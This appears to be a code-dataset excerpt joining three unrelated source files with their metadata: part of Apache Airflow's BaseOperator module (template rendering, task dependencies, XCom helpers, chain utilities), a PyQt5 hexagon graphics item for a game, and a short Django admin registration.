self, context: Context, jinja_env: Optional[jinja2.Environment] = None
) -> None:
"""
Template all attributes listed in template_fields. Note this operation is irreversible.
:param context: Dict with values to apply on content
:type context: dict
:param jinja_env: Jinja environment
:type jinja_env: jinja2.Environment
"""
if not jinja_env:
jinja_env = self.get_template_env()
self._do_render_template_fields(self, self.template_fields, context, jinja_env, set())
def _do_render_template_fields(
self,
parent: Any,
template_fields: Iterable[str],
context: Context,
jinja_env: jinja2.Environment,
seen_oids: Set,
) -> None:
for attr_name in template_fields:
content = getattr(parent, attr_name)
if content:
rendered_content = self.render_template(content, context, jinja_env, seen_oids)
setattr(parent, attr_name, rendered_content)
def render_template(
self,
content: Any,
context: Context,
jinja_env: Optional[jinja2.Environment] = None,
seen_oids: Optional[Set] = None,
) -> Any:
"""
Render a templated string. The content can be a collection holding multiple templated strings and will
be templated recursively.
:param content: Content to template. Only strings can be templated (may be inside collection).
:type content: Any
:param context: Dict with values to apply on templated content
:type context: dict
:param jinja_env: Jinja environment. Can be provided to avoid re-creating Jinja environments during
recursion.
:type jinja_env: jinja2.Environment
:param seen_oids: template fields already rendered (to avoid RecursionError on circular dependencies)
:type seen_oids: set
:return: Templated content
"""
if not jinja_env:
jinja_env = self.get_template_env()
# Imported here to avoid circular dependency
from airflow.models.param import DagParam
from airflow.models.xcom_arg import XComArg
if isinstance(content, str):
if any(content.endswith(ext) for ext in self.template_ext): # Content contains a filepath.
template = jinja_env.get_template(content)
else:
template = jinja_env.from_string(content)
if self.has_dag() and self.dag.render_template_as_native_obj:
return render_template_as_native(template, context)
return render_template_to_string(template, context)
elif isinstance(content, (XComArg, DagParam)):
return content.resolve(context)
if isinstance(content, tuple):
if type(content) is not tuple:
# Special case for named tuples
return content.__class__(
*(self.render_template(element, context, jinja_env) for element in content)
)
else:
return tuple(self.render_template(element, context, jinja_env) for element in content)
elif isinstance(content, list):
return [self.render_template(element, context, jinja_env) for element in content]
elif isinstance(content, dict):
return {key: self.render_template(value, context, jinja_env) for key, value in content.items()}
elif isinstance(content, set):
return {self.render_template(element, context, jinja_env) for element in content}
else:
if seen_oids is None:
seen_oids = set()
self._render_nested_template_fields(content, context, jinja_env, seen_oids)
return content
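# A minimal sketch of render_template behaviour (operator and context values
# are illustrative):
#
#     op.render_template("echo {{ ds }}", {"ds": "2021-01-01"})
#     # -> "echo 2021-01-01"
#     op.render_template({"cmd": "{{ ds }}", "retries": 3}, {"ds": "2021-01-01"})
#     # -> {"cmd": "2021-01-01", "retries": 3}  (collections are templated recursively)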
def _render_nested_template_fields(
self, content: Any, context: Context, jinja_env: jinja2.Environment, seen_oids: Set
) -> None:
if id(content) not in seen_oids:
seen_oids.add(id(content))
try:
nested_template_fields = content.template_fields
except AttributeError:
# content has no inner template fields
return
self._do_render_template_fields(content, nested_template_fields, context, jinja_env, seen_oids)
def get_template_env(self) -> jinja2.Environment:
"""Fetch a Jinja template environment from the DAG or instantiate empty environment if no DAG."""
return (
self.dag.get_template_env()
if self.has_dag()
else airflow.templates.SandboxedEnvironment(cache_size=0)
)
def prepare_template(self) -> None:
"""
Hook that is triggered after the templated fields get replaced
by their content. If you need your operator to alter the
content of the file before the template is rendered,
it should override this method to do so.
"""
def resolve_template_files(self) -> None:
"""Getting the content of files for template_field / template_ext"""
if self.template_ext:
for field in self.template_fields:
content = getattr(self, field, None)
if content is None:
continue
elif isinstance(content, str) and any(content.endswith(ext) for ext in self.template_ext):
env = self.get_template_env()
try:
setattr(self, field, env.loader.get_source(env, content)[0]) # type: ignore
except Exception as e:
self.log.exception(e)
elif isinstance(content, list):
env = self.dag.get_template_env()
for i, item in enumerate(content):
if isinstance(item, str) and any(item.endswith(ext) for ext in self.template_ext):
try:
content[i] = env.loader.get_source(env, item)[0] # type: ignore
except Exception as e:
self.log.exception(e)
self.prepare_template()
@property
def upstream_list(self) -> List["BaseOperator"]:
"""@property: list of tasks directly upstream"""
return [self.dag.get_task(tid) for tid in self._upstream_task_ids]
@property
def upstream_task_ids(self) -> Set[str]:
"""@property: set of ids of tasks directly upstream"""
return self._upstream_task_ids
@property
def downstream_list(self) -> List["BaseOperator"]:
"""@property: list of tasks directly downstream"""
return [self.dag.get_task(tid) for tid in self._downstream_task_ids]
@property
def downstream_task_ids(self) -> Set[str]:
"""@property: set of ids of tasks directly downstream"""
return self._downstream_task_ids
@provide_session
def clear(
self,
start_date: Optional[datetime] = None,
end_date: Optional[datetime] = None,
upstream: bool = False,
downstream: bool = False,
session: Session = NEW_SESSION,
):
"""
Clears the state of task instances associated with the task, following
the parameters specified.
"""
qry = session.query(TaskInstance).filter(TaskInstance.dag_id == self.dag_id)
if start_date:
qry = qry.filter(TaskInstance.execution_date >= start_date)
if end_date:
qry = qry.filter(TaskInstance.execution_date <= end_date)
tasks = [self.task_id]
if upstream:
tasks += [t.task_id for t in self.get_flat_relatives(upstream=True)]
if downstream:
tasks += [t.task_id for t in self.get_flat_relatives(upstream=False)]
qry = qry.filter(TaskInstance.task_id.in_(tasks))
results = qry.all()
count = len(results)
clear_task_instances(results, session, dag=self.dag)
session.commit()
return count
@provide_session
def get_task_instances(
self,
start_date: Optional[datetime] = None,
end_date: Optional[datetime] = None,
session: Session = NEW_SESSION,
) -> List[TaskInstance]:
"""
Get the task instances related to this task for a specific date
range.
"""
end_date = end_date or timezone.utcnow()
return (
session.query(TaskInstance)
.filter(TaskInstance.dag_id == self.dag_id)
.filter(TaskInstance.task_id == self.task_id)
.filter(TaskInstance.execution_date >= start_date)
.filter(TaskInstance.execution_date <= end_date)
.order_by(TaskInstance.execution_date)
.all()
)
def get_flat_relative_ids(
self,
upstream: bool = False,
found_descendants: Optional[Set[str]] = None,
) -> Set[str]:
"""Get a flat set of relatives' ids, either upstream or downstream."""
if not self._dag:
return set()
if not found_descendants:
found_descendants = set()
relative_ids = self.get_direct_relative_ids(upstream)
for relative_id in relative_ids:
if relative_id not in found_descendants:
found_descendants.add(relative_id)
relative_task = self._dag.task_dict[relative_id]
relative_task.get_flat_relative_ids(upstream, found_descendants)
return found_descendants
def get_flat_relatives(self, upstream: bool = False):
"""Get a flat list of relatives, either upstream or downstream."""
if not self._dag:
return set()
from airflow.models.dag import DAG
dag: DAG = self._dag
return list(map(lambda task_id: dag.task_dict[task_id], self.get_flat_relative_ids(upstream)))
@provide_session
def run(
self,
start_date: Optional[datetime] = None,
end_date: Optional[datetime] = None,
ignore_first_depends_on_past: bool = True,
ignore_ti_state: bool = False,
mark_success: bool = False,
test_mode: bool = False,
session: Session = NEW_SESSION,
) -> None:
"""Run a set of task instances for a date range."""
from airflow.models import DagRun
from airflow.utils.types import DagRunType
# Assertions for typing -- we need a dag, for this function, and when we have a DAG we are
# _guaranteed_ to have start_date (else we couldn't have been added to a DAG)
if TYPE_CHECKING:
assert self.start_date
start_date = pendulum.instance(start_date or self.start_date)
end_date = pendulum.instance(end_date or self.end_date or timezone.utcnow())
for info in self.dag.iter_dagrun_infos_between(start_date, end_date, align=False):
ignore_depends_on_past = info.logical_date == start_date and ignore_first_depends_on_past
try:
dag_run = (
session.query(DagRun)
.filter(
DagRun.dag_id == self.dag_id,
DagRun.execution_date == info.logical_date,
)
.one()
)
ti = TaskInstance(self, run_id=dag_run.run_id)
except NoResultFound:
# This is _mostly_ only used in tests
dr = DagRun(
dag_id=self.dag_id,
run_id=DagRun.generate_run_id(DagRunType.MANUAL, info.logical_date),
run_type=DagRunType.MANUAL,
execution_date=info.logical_date,
data_interval=info.data_interval,
)
ti = TaskInstance(self, run_id=dr.run_id)
ti.dag_run = dr
session.add(dr)
session.flush()
ti.run(
mark_success=mark_success,
ignore_depends_on_past=ignore_depends_on_past,
ignore_ti_state=ignore_ti_state,
test_mode=test_mode,
session=session,
)
def dry_run(self) -> None:
"""Performs dry run for the operator - just render template fields."""
self.log.info('Dry run')
for field in self.template_fields:
content = getattr(self, field)
if content and isinstance(content, str):
self.log.info('Rendering template for %s', field)
self.log.info(content)
def get_direct_relative_ids(self, upstream: bool = False) -> Set[str]:
"""
Get set of the direct relative ids to the current task, upstream or
downstream.
"""
if upstream:
return self._upstream_task_ids
else:
return self._downstream_task_ids
def get_direct_relatives(self, upstream: bool = False) -> List["BaseOperator"]:
"""
Get list of the direct relatives to the current task, upstream or
downstream.
"""
if upstream:
return self.upstream_list
else:
return self.downstream_list
def __repr__(self):
return "<Task({self.task_type}): {self.task_id}>".format(self=self)
@property
def task_type(self) -> str:
"""@property: type of the task"""
return self.__class__.__name__
def add_only_new(self, item_set: Set[str], item: str, dag_id: str) -> None:
"""Adds only new items to item set"""
if item in item_set:
self.log.warning('Dependency %s, %s already registered for DAG: %s', self, item, dag_id)
else:
item_set.add(item)
@property
def roots(self) -> List["BaseOperator"]:
"""Required by TaskMixin"""
return [self]
@property
def leaves(self) -> List["BaseOperator"]:
"""Required by TaskMixin"""
return [self]
def _set_relatives(
self,
task_or_task_list: Union[TaskMixin, Sequence[TaskMixin]],
upstream: bool = False,
edge_modifier: Optional[EdgeModifier] = None,
) -> None:
"""Sets relatives for the task or task list."""
if not isinstance(task_or_task_list, Sequence):
task_or_task_list = [task_or_task_list]
task_list: List["BaseOperator"] = []
for task_object in task_or_task_list:
task_object.update_relative(self, not upstream)
relatives = task_object.leaves if upstream else task_object.roots
task_list.extend(relatives)
for task in task_list:
if not isinstance(task, BaseOperator):
raise AirflowException(
f"Relationships can only be set between Operators; received {task.__class__.__name__}"
)
# relationships can only be set if the tasks share a single DAG. Tasks
# without a DAG are assigned to that DAG.
dags = {
task._dag.dag_id: task._dag for task in self.roots + task_list if task.has_dag() # type: ignore
}
if len(dags) > 1:
raise AirflowException(
f'Tried to set relationships between tasks in more than one DAG: {dags.values()}'
)
elif len(dags) == 1:
dag = dags.popitem()[1]
else:
raise AirflowException(
f"Tried to create relationships between tasks that don't have DAGs yet. "
f"Set the DAG for at least one task and try again: {[self] + task_list}"
)
if dag and not self.has_dag():
# If this task does not yet have a dag, add it to the same dag as the other task and
# put it in the dag's root TaskGroup.
self.dag = dag
self.dag.task_group.add(self)
for task in task_list:
if dag and not task.has_dag():
# If the other task does not yet have a dag, add it to the same dag as this task and
# put it in the dag's root TaskGroup.
task.dag = dag
task.dag.task_group.add(task)
if upstream:
task.add_only_new(task.get_direct_relative_ids(upstream=False), self.task_id, self.dag.dag_id)
self.add_only_new(self._upstream_task_ids, task.task_id, task.dag.dag_id)
if edge_modifier:
edge_modifier.add_edge_info(self.dag, task.task_id, self.task_id)
else:
self.add_only_new(self._downstream_task_ids, task.task_id, task.dag.dag_id)
task.add_only_new(task.get_direct_relative_ids(upstream=True), self.task_id, self.dag.dag_id)
if edge_modifier:
edge_modifier.add_edge_info(self.dag, self.task_id, task.task_id)
def set_downstream(
self,
task_or_task_list: Union[TaskMixin, Sequence[TaskMixin]],
edge_modifier: Optional[EdgeModifier] = None,
) -> None:
"""
Set a task or a task list to be directly downstream from the current
task. Required by TaskMixin.
"""
self._set_relatives(task_or_task_list, upstream=False, edge_modifier=edge_modifier)
def set_upstream(
self,
task_or_task_list: Union[TaskMixin, Sequence[TaskMixin]],
edge_modifier: Optional[EdgeModifier] = None,
) -> None:
"""
Set a task or a task list to be directly upstream from the current
task. Required by TaskMixin.
"""
self._set_relatives(task_or_task_list, upstream=True, edge_modifier=edge_modifier)
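# Equivalent ways of declaring the same dependency between two hypothetical
# tasks t1 and t2 (the bitshift forms come from TaskMixin):
#
#     t1.set_downstream(t2)
#     t2.set_upstream(t1)
#     t1 >> t2
#     t2 << t1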
@property
def output(self):
"""Returns reference to XCom pushed by current operator"""
from airflow.models.xcom_arg import XComArg
return XComArg(operator=self)
@staticmethod
def xcom_push(
context: Any,
key: str,
value: Any,
execution_date: Optional[datetime] = None,
) -> None:
"""
Make an XCom available for tasks to pull.
:param context: Execution Context Dictionary
:type: Any
:param key: A key for the XCom
:type key: str
:param value: A value for the XCom. The value is pickled and stored
in the database.
:type value: any pickleable object
:param execution_date: if provided, the XCom will not be visible until
this date. This can be used, for example, to send a message to a
task on a future date without it being immediately visible.
:type execution_date: datetime
"""
context['ti'].xcom_push(key=key, value=value, execution_date=execution_date)
@staticmethod
def xcom_pull(
context: Any,
task_ids: Optional[List[str]] = None,
dag_id: Optional[str] = None,
key: str = XCOM_RETURN_KEY,
include_prior_dates: Optional[bool] = None,
) -> Any:
"""
Pull XComs that optionally meet certain criteria.
The default value for `key` limits the search to XComs
that were returned by other tasks (as opposed to those that were pushed
manually). To remove this filter, pass key=None (or any desired value).
If a single task_id string is provided, the result is the value of the
most recent matching XCom from that task_id. If multiple task_ids are
provided, a tuple of matching values is returned. None is returned
whenever no matches are found.
:param context: Execution Context Dictionary
:type: Any
:param key: A key for the XCom. If provided, only XComs with matching
keys will be returned. The default key is 'return_value', also
available as a constant XCOM_RETURN_KEY. This key is automatically
given to XComs returned by tasks (as opposed to being pushed
manually). To remove the filter, pass key=None.
:type key: str
:param task_ids: Only XComs from tasks with matching ids will be
pulled. Can pass None to remove the filter.
:type task_ids: str or iterable of strings (representing task_ids)
:param dag_id: If provided, only pulls XComs from this DAG.
If None (default), the DAG of the calling task is used.
:type dag_id: str
:param include_prior_dates: If False, only XComs from the current
execution_date are returned. If True, XComs from previous dates
are returned as well.
:type include_prior_dates: bool
"""
return context['ti'].xcom_pull(
key=key, task_ids=task_ids, dag_id=dag_id, include_prior_dates=include_prior_dates
)
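# A minimal sketch of the XCom helpers above, as used inside an operator's
# execute() method (key, value, and upstream task id are hypothetical):
#
#     def execute(self, context):
#         # make a value available to downstream tasks
#         self.xcom_push(context, key="row_count", value=42)
#         # fetch the return value pushed by an upstream task
#         upstream_result = self.xcom_pull(context, task_ids="extract")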
@cached_property
def extra_links(self) -> List[str]:
"""@property: extra links for the task"""
return list(
set(self.operator_extra_link_dict.keys()).union(self.global_operator_extra_link_dict.keys())
)
def get_extra_links(self, dttm: datetime, link_name: str) -> Optional[Dict[str, Any]]:
"""
For an operator, gets the URL that the external links specified in
`extra_links` should point to.
:raise ValueError: The error message of a ValueError will be passed on through to
the frontend to show up as a tooltip on the disabled link
:param dttm: The datetime parsed execution date for the URL being searched for
:param link_name: The name of the link we're looking for the URL for. Should be
one of the options specified in `extra_links`
:return: A URL
"""
if link_name in self.operator_extra_link_dict:
return self.operator_extra_link_dict[link_name].get_link(self, dttm)
elif link_name in self.global_operator_extra_link_dict:
return self.global_operator_extra_link_dict[link_name].get_link(self, dttm)
else:
return None
@classmethod
def get_serialized_fields(cls):
"""Stringified DAGs and operators contain exactly these fields."""
if not cls.__serialized_fields:
from airflow.models.dag import DagContext
# make sure the following dummy task is not added to current active
# dag in context, otherwise, it will result in
# `RuntimeError: dictionary changed size during iteration`
# Exception in SerializedDAG.serialize_dag() call.
DagContext.push_context_managed_dag(None)
cls.__serialized_fields = frozenset(
vars(BaseOperator(task_id='test')).keys()
- {
'inlets',
'outlets',
'_upstream_task_ids',
'default_args',
'dag',
'_dag',
'_BaseOperator__instantiated',
}
| {
'_task_type',
'subdag',
'ui_color',
'ui_fgcolor',
'template_ext',
'template_fields',
'template_fields_renderers',
'params',
}
)
DagContext.pop_context_managed_dag()
return cls.__serialized_fields
def is_smart_sensor_compatible(self):
"""Return if this operator can use smart service. Default False."""
return False
@property
def inherits_from_dummy_operator(self):
"""Used to determine if an Operator is inherited from DummyOperator"""
# This looks like `isinstance(self, DummyOperator)` would work, but this also
# needs to cope when `self` is a Serialized instance of a DummyOperator or one
# of its sub-classes (which don't inherit from anything but BaseOperator).
return getattr(self, '_is_dummy', False)
def defer(
self,
*,
trigger: BaseTrigger,
method_name: str,
kwargs: Optional[Dict[str, Any]] = None,
timeout: Optional[timedelta] = None,
):
"""
Marks this Operator as being "deferred" - that is, suspending its
execution until the provided trigger fires an event.
This is achieved by raising a special exception (TaskDeferred)
which is caught in the main _execute_task wrapper.
"""
raise TaskDeferred(trigger=trigger, method_name=method_name, kwargs=kwargs, timeout=timeout)
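    # Minimal deferral sketch (assumes a trigger class such as
    # airflow.triggers.temporal.DateTimeTrigger is available; the operator below
    # is hypothetical and only illustrates the calling convention):
    #
    #     class WaitOneHourOperator(BaseOperator):
    #         def execute(self, context):
    #             self.defer(
    #                 trigger=DateTimeTrigger(moment=pendulum.now().add(hours=1)),
    #                 method_name="execute_complete",
    #             )
    #
    #         def execute_complete(self, context, event=None):
    #             # execution resumes here once the trigger fires
    #             return event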
Chainable = Union[BaseOperator, "XComArg", EdgeModifier, "TaskGroup"]
def chain(*tasks: Union[Chainable, Sequence[Chainable]]) -> None:
r"""
Given a number of tasks, builds a dependency chain.
    This function accepts values of BaseOperator (aka tasks), EdgeModifiers (aka Labels), XComArg, TaskGroups,
    or lists containing any mix of these types. If you want to chain between two lists, they must be the
    same length.
Using classic operators/sensors:
.. code-block:: python
chain(t1, [t2, t3], [t4, t5], t6)
is equivalent to::
          / -> t2 -> t4 \
        t1               -> t6
          \ -> t3 -> t5 /
.. code-block:: python
t1.set_downstream(t2)
t1.set_downstream(t3)
t2.set_downstream(t4)
t3.set_downstream(t5)
t4.set_downstream(t6)
t5.set_downstream(t6)
Using task-decorated functions aka XComArgs:
.. code-block:: python
chain(x1(), [x2(), x3()], [x4(), x5()], x6())
is equivalent to::
          / -> x2 -> x4 \
        x1               -> x6
          \ -> x3 -> x5 /
.. code-block:: python
x1 = x1()
x2 = x2()
x3 = x3()
x4 = x4()
x5 = x5()
x6 = x6()
x1.set_downstream(x2)
x1.set_downstream(x3)
x2.set_downstream(x4)
x3.set_downstream(x5)
x4.set_downstream(x6)
x5.set_downstream(x6)
Using TaskGroups:
.. code-block:: python
chain(t1, task_group1, task_group2, t2)
t1.set_downstream(task_group1)
task_group1.set_downstream(task_group2)
task_group2.set_downstream(t2)
It is also possible to mix between classic operator/sensor, EdgeModifiers, XComArg, and TaskGroups:
.. code-block:: python
chain(t1, [Label("branch one"), Label("branch two")], [x1(), x2()], task_group1, t2())
is equivalent to::
/ "branch one" -> x1 \
t1 -> t2 -> x3
\ "branch two" -> x2 /
.. code-block:: python
x1 = x1()
x2 = x2()
x3 = x3()
label1 = Label("branch one")
label2 = Label("branch two")
t1.set_downstream(label1)
label1.set_downstream(x1)
t2.set_downstream(label2)
label2.set_downstream(x2)
x1.set_downstream(task_group1)
x2.set_downstream(task_group1)
task_group1.set_downstream(x3)
# or
x1 = x1()
x2 = x2()
x3 = x3()
t1.set_downstream(x1, edge_modifier=Label("branch one"))
t1.set_downstream(x2, edge_modifier=Label("branch two"))
x1.set_downstream(task_group1)
x2.set_downstream(task_group1)
task_group1.set_downstream(x3)
:param tasks: Individual and/or list of tasks, EdgeModifiers, XComArgs, or TaskGroups to set dependencies
:type tasks: List[airflow.models.BaseOperator], airflow.models.BaseOperator,
List[airflow.utils.EdgeModifier], airflow.utils.EdgeModifier, List[airflow.models.XComArg], XComArg,
List[airflow.utils.TaskGroup], or airflow.utils.TaskGroup
"""
from airflow.models.xcom_arg import XComArg
from airflow.utils.task_group import TaskGroup
chainable_types = (BaseOperator, XComArg, EdgeModifier, TaskGroup)
for index, up_task in enumerate(tasks[:-1]):
down_task = tasks[index + 1]
if isinstance(up_task, chainable_types):
up_task.set_downstream(down_task)
continue
if isinstance(down_task, chainable_types):
down_task.set_upstream(up_task)
continue
if not isinstance(up_task, Sequence) or not isinstance(down_task, Sequence):
raise TypeError(f'Chain not supported between instances of {type(up_task)} and {type(down_task)}')
up_task_list = up_task
down_task_list = down_task
if len(up_task_list) != len(down_task_list):
raise AirflowException(
f'Chain not supported for different length Iterable. '
f'Got {len(up_task_list)} and {len(down_task_list)}.'
)
for up_t, down_t in zip(up_task_list, down_task_list):
up_t.set_downstream(down_t)
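# Note on the loop above: arguments are processed pairwise. A single chainable on
# either side of a pair absorbs the whole neighbouring element or list, while two
# lists are zipped element-by-element, which is why mismatched list lengths raise
# an AirflowException.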
def cross_downstream(
from_tasks: Sequence[Union[BaseOperator, "XComArg"]],
to_tasks: Union[BaseOperator, "XComArg", Sequence[Union[BaseOperator, "XComArg"]]],
):
r"""
Set downstream dependencies for all tasks in from_tasks to all tasks in to_tasks.
Using classic operators/sensors:
.. code-block:: python
cross_downstream(from_tasks=[t1, t2, t3], to_tasks=[t4, t5, t6])
is equivalent to::
        t1 ---> t4
           \ /
        t2 -X -> t5
           / \
        t3 ---> t6
.. code-block:: python
t1.set_downstream(t4)
t1.set_downstream(t5)
t1.set_downstream(t6)
t2.set_downstream(t4)
t2.set_downstream(t5)
t2.set_downstream(t6)
t3.set_downstream(t4)
t3.set_downstream(t5)
t3.set_downstream(t6)
Using task-decorated functions aka XComArgs:
.. code-block:: python
cross_downstream(from_tasks=[x1(), x2(), x3()], to_tasks=[x4(), x5(), x6()])
is equivalent to::
        x1 ---> x4
           \ /
        x2 -X -> x5
           / \
        x3 ---> x6
.. code-block:: python
x1 = x1()
x2 = x2()
x3 = x3()
x4 = x4()
x5 = x5()
x6 = x6()
x1.set_downstream(x4)
x1.set_downstream(x5)
x1.set_downstream(x6)
x2.set_downstream(x4)
x2.set_downstream(x5)
x2.set_downstream(x6)
x3.set_downstream(x4)
x3.set_downstream(x5)
x3.set_downstream(x6)
It is also possible to mix between classic operator/sensor and XComArg tasks:
.. code-block:: python
cross_downstream(from_tasks=[t1, x2(), t3], to_tasks=[x1(), t2, x3()])
is equivalent to::
        t1 ---> x1
           \ /
        x2 -X -> t2
           / \
        t3 ---> x3
.. code-block:: python
x1 = x1()
x2 = x2()
x3 = x3()
t1.set_downstream(x1)
t1.set_downstream(t2)
t1.set_downstream(x3)
x2.set_downstream(x1)
x2.set_downstream(t2)
x2.set_downstream(x3)
t3.set_downstream(x1)
t3.set_downstream(t2)
t3.set_downstream(x3)
:param from_tasks: List of tasks or XComArgs to start from.
:type from_tasks: List[airflow.models.BaseOperator] or List[airflow.models.XComArg]
:param to_tasks: List of tasks or XComArgs to set as downstream dependencies.
:type to_tasks: List[airflow.models.BaseOperator] or List[airflow.models.XComArg]
"""
for task in from_tasks:
task.set_downstream(to_tasks)
@attr.s(auto_attribs=True)
class BaseOperatorLink(metaclass=ABCMeta):
"""Abstract base class that defines how we get an operator link."""
operators: ClassVar[List[Type[BaseOperator]]] = []
"""
This property will be used by Airflow Plugins to find the Operators to which you want
to assign this Operator Link
    :return: List of Operator classes for which this link should be shown on the task UI
"""
@property
@abstractmethod
def name(self) -> str:
"""
Name of the link. This will be the button name on the task UI.
:return: link name
"""
@abstractmethod
def get_link(self, operator: BaseOperator, dttm: datetime) -> str:
"""
Link to external system.
:param operator: airflow operator
:param dttm: datetime
:return: link to external system
"""
| 39.201238
| 110
| 0.633536
|
7c4d769146cc973267ce67ce2e90aa8e87baaa78
| 6,748
|
py
|
Python
|
etchlib/graphicsitem/hexcube.py
|
tonningp/pirate-game
|
77070b1c2252c1b42b5763a27a057801998627af
|
[
"MIT"
] | null | null | null |
etchlib/graphicsitem/hexcube.py
|
tonningp/pirate-game
|
77070b1c2252c1b42b5763a27a057801998627af
|
[
"MIT"
] | null | null | null |
etchlib/graphicsitem/hexcube.py
|
tonningp/pirate-game
|
77070b1c2252c1b42b5763a27a057801998627af
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import math
from PyQt5.QtCore import *
from PyQt5.QtGui import (
QPainter,
QColor,
qRgb,
QPen,
QIcon,
QBrush,
QPixmap,
QPainterPath,
QImage,
QFont,
QPolygon,
QPolygonF,
QFontMetrics
)
from PyQt5.QtWidgets import (
QGraphicsObject,
QGraphicsItem
)
from etchlib.defaults import colors
class Item(QGraphicsObject):
"""
http://www.redblobgames.com/grids/hexagons
"""
defaultBrushColor = QColor(colors['Moccasin'])
enterBrushColor = QColor(colors['LightSeaGreen'])
selectedBrush = QColor(colors['LightBlue'])
originBrush = QColor(colors['LightCoral'])
ADJUST = 0.085
hoverEnter = pyqtSignal(object)
hoverLeave = pyqtSignal(object)
changeOrigin = pyqtSignal(object)
def __init__(self,
oid,
grid,
orient='pointy',
cubeline=True,
outline=False,
parent=None):
super(Item, self).__init__(parent)
self.oid = oid
self.grid = grid
self.cubeline=cubeline
self.outline = outline
Item.BoundingRect = grid.block()
self.points_method = getattr(self,orient+'HexCorner')
self.size = self.boundingRect().width()/2
Item.polygon = QPolygonF(self.points())
#self.setFlag(QGraphicsObject.ItemIsMovable,True)
#self.setFlag(QGraphicsObject.ItemSendsScenePositionChanges,True)
self.setFlag(QGraphicsObject.ItemIsSelectable,True)
self.setAcceptHoverEvents(True)
self.pressed = False
self.currentPolyBrush = Item.defaultBrushColor
self.origin = None
def __call__(self):
return QPolygonF(self.polygon)
def setOrigin(self,origin):
self.origin = origin
def isOrigin(self):
return self.origin == self
def boundingRect(self):
return Item.BoundingRect
def center(self):
return Item.BoundingRect.center()
def points(self):
return [self.points_method(self.boundingRect().center(),self.size,i)
for i in range(6)]
def getAngle(self,i):
angle_deg = 60 * i + 30
return math.pi / 180 * angle_deg
def height(self):
return self.size * 2.0
def width(self):
return math.sqrt(3)/2.0 * self.height()
def pointyHexCorner(self,center, size, i):
angle_rad = self.getAngle(i)
x = round(center.x() + size * math.cos(angle_rad))
y = round(center.y() + size * math.sin(angle_rad))
return QPointF(x,y)
def flatHexCorner(self,center, size, i):
angle_rad = self.getAngle(i)
x = round(center.x() + size * math.sin(angle_rad))
y = round(center.y() + size * math.cos(angle_rad))
return QPointF(x,y)
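    # Worked example for the pointy-top case: with center=(0, 0) and size=10,
    # corner i=0 uses angle 60*0 + 30 = 30 degrees, so
    # x = round(10 * cos(pi/6)) = 9 and y = round(10 * sin(pi/6)) = 5.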
def itemChange(self,change,value):
if change == QGraphicsItem.ItemPositionChange and self.scene():
self.scene().update()
return super(Item,self).itemChange(change,value)
def hoverEnterEvent(self,event):
self.currentPolyBrush = Item.enterBrushColor
self.update()
self.hoverEnter.emit(self)
return super(Item,self).hoverEnterEvent(event)
def hoverLeaveEvent(self,event):
self.currentPolyBrush = Item.defaultBrushColor
self.update()
self.hoverLeave.emit(self)
return super(Item,self).hoverLeaveEvent(event)
def mouseDoubleClickEvent(self,event):
self.changeOrigin.emit(self)
def mousePressEvent(self,event):
self.pressed = True
if event.button() == Qt.RightButton:
self.currentPolyBrush = QColor(colors['MedAquamarine'])
self.update()
return super(Item,self).mousePressEvent(event)
def mouseReleaseEvent(self,event):
self.pressed = False
self.update()
return super(Item,self).mouseReleaseEvent(event)
def shape(self):
path = QPainterPath()
path.addPolygon(Item.polygon)
        return path
def coords(self):
return (self.col - self.origin.col,self.row - self.origin.row)
def isOdd(self,row):
return row % 2
def setToGrid(self,col,row):
self.col = col
self.row = row
rect = self.grid.boundingRect()
adjustWidth = Item.ADJUST*self.width()
if self.isOdd(row):
start = \
QPointF(rect.left()+self.width()+adjustWidth,rect.top()+self.height())
else:
start = \
QPointF(rect.left()+self.width()/2+adjustWidth,rect.top()+self.height())
delta = QPointF(col*self.width(),row*3*self.height()/4)
pos = \
self.mapToItem(self.grid,start+delta)
#print("{},{}".format(pos.x(),pos.y()))
self.setPos(self.mapToScene(pos))
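    # Layout note: odd rows start half a cell width further right than even rows
    # (an offset hex layout), and successive rows are spaced 3/4 of the hex
    # height apart, the standard packing for pointy-top hexagons.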
def drawPoints(self,qp):
qp.setPen(Qt.red)
for p in self.points():
qp.drawPoint(p.x(), p.y())
def printPoints(self):
for p in self.points():
print(p)
def drawPos(self,painter):
painter.setPen(Qt.black)
painter.setFont(QFont("Helvetica",5,QFont.Bold))
width = self.boundingRect().width()
height = self.boundingRect().height()
start = self.center() \
- QPointF(width/2 - (.10 * width),0.20*height) #self.boundingRect().height()/2)
painter.drawText(start,"({0:.2f},{1:.2f})".format(self.pos().x(),self.pos().y()))
painter.drawText(start-QPointF(0,.10*height),"({0:.2f},{1:.2f})".format(self.center().x(),self.center().y()))
painter.setPen(Qt.black)
painter.setFont(QFont("Helvetica",5,QFont.Bold))
painter.drawText(self.center(),str(self.oid))
def paint(self, painter, option, widget):
if self.outline:
painter.setPen(QPen(Qt.red,1,Qt.DotLine))
painter.drawRect(self.boundingRect())
if self.isSelected():
painter.setBrush(self.selectedBrush)
elif self.isOrigin():
painter.setBrush(self.originBrush)
else:
painter.setBrush(self.currentPolyBrush)
painter.setPen(Qt.blue)
painter.drawPolygon(Item.polygon)
#painter.drawEllipse(self.center(),1,1)
if self.cubeline:
if self.isSelected() or self.isOrigin():
painter.setPen(QPen(Qt.black,1,Qt.DotLine))
else:
painter.setPen(QPen(Qt.gray,1,Qt.DotLine))
painter.drawLine(self.points()[1],self.center())
painter.drawLine(self.points()[3],self.center())
painter.drawLine(self.points()[5],self.center())
# Notes:
# http://www.redblobgames.com/grids/hexagons/
| 31.53271
| 117
| 0.599733
|
e716fcc79ccb714b48cdbf531f79d53b05933d85
| 153
|
py
|
Python
|
aliases/admin.py
|
6ba/bbgo
|
dfa9b55b8d40c53940105333c2e03a3c6abddb88
|
[
"MIT"
] | 22
|
2017-07-13T04:07:03.000Z
|
2021-06-10T05:39:29.000Z
|
aliases/admin.py
|
genonfire/bbgo
|
5f374f0b620f4dc3e106de5969f26f4585044605
|
[
"MIT"
] | 7
|
2017-08-25T06:33:45.000Z
|
2019-10-14T05:49:32.000Z
|
aliases/admin.py
|
6ba/bbgo
|
dfa9b55b8d40c53940105333c2e03a3c6abddb88
|
[
"MIT"
] | 9
|
2017-12-31T02:45:58.000Z
|
2021-01-22T03:09:02.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import Alias
admin.site.register(Alias)
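# A slightly richer registration is sketched below (the field names are
# hypothetical); it would replace the plain admin.site.register(Alias) call above:
#
#     @admin.register(Alias)
#     class AliasAdmin(admin.ModelAdmin):
#         list_display = ("id",)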
| 17
| 39
| 0.764706
|
